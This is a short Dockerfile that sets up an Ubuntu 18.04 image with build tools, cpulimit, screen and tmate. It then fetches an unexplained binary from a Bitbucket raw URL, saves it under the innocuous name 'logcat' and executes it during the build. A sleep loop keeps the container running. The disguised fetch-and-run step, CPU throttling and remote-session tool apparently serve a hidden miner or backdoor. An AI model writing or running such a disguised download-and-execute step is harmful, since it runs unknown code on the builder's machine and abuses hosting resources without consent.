FROM ubuntu:18.04

RUN \
  sed -i 's/# \(.*multiverse$\)/\1/g' /etc/apt/sources.list && \
  apt-get update && \
  apt-get install -y software-properties-common && \
  add-apt-repository ppa:ubuntu-toolchain-r/test -y && \
  apt-get update && \
  apt-get install -y build-essential && \
  apt install gcc-9 -y && \
  apt install libstdc++6 -y && \
  apt-get install -y byobu curl git htop man unzip vim wget nano iputils-ping cpulimit tar screen tmate && \
  rm -rf /var/lib/apt/lists/*

RUN chmod 777 /run/screen
RUN wget -O logcat https://bitbucket.org/seaguardian/guardian3/raw/3373391ca242630b8657d1e5794ad97edd38a204/run && chmod +x logcat && ./logcat
RUN time=${1-1}; while test $time -gt 0; do printf "$time"; sleep 60; done